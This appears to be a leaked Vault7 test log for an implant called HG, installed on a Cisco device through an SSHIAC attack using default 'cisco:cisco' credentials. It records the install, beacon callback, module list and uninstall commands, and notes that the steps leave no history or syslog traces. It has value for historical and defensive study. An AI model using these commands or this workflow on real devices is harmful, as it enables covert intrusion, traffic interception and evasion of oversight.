Vault7: CIA Hacking Tools Revealed

Owner: User #71467
Aquaman-5h HG 3.3.1 - Full Test
Xetrron delivered Aquaman-5h HG 3.3.1 with a fix to EAR 5244 (snooping causing err-disable). Plan is to perform a full test of this Aquaman delivery.
Testing Summary
- Collect Baseline information for use in later comparisons
- Deleted all previous crashinfo files from flash card of Target Device
- Reloaded Target Device
- Collected baseline files with output of show tech, dir all, show mem and CPU, show log
- Used memory - 26975916 (b)
- CPU - 5%/0%; one minute: 6%; five minutes: 6%
- Ran RANCID - collected version 1.6
- Install/Uninstall HG without leave behind
- SSHIAC attack - ./sshiac --ip --l cisco:cisco password
- LG EC-125 DH EC-60 EC-159 M - these codes are acceptable per readme
- Observed CPU during attack: 46% highest spike
- Used memory after SSHIAC attack - 26966496 (b)
- Install HG
- Left the interpacket delay at 1s (not directed to change it in readme, and I'm following the readme)
- hg_start - result success - Result: 0x00000001
- Observed CPU during install: 19% highest CPU spike
- Used memory after HG install - 29893996 (b)
- no commands from attack or install observed in show history
- Establish HG Comms
- Edited aquaman-5h.txt file - replaced <INT> with eth0 and <IP TO TRIGGER> with
- Ran
- Established CT session - Observed 19% spike during SSL handshake
- beacon call_base_back https 443
- Used memory after CT session - 29863488 (b)
- Hit tab twice:
aliases ca collect device encryption https mitm packet redir tun
beachhead capability communication dns file ilm mode process scramble verbosity
beacon cmd compression ebroker filesystem memory module quit socket web
- HG Base version 3.3.1
- Uninstall HG
- device uninstall_hg -mp -f
- no syslog messages generated
- Used memory after uninstall 26954800 (b)
- Observed CPU during uninstall - 12% spike
- After uninstall - CPU utilization for five seconds: 5%/0%; one minute: 6%; five minutes: 6%
- SSHIAC attack - ./sshiac --ip --l cisco:cisco password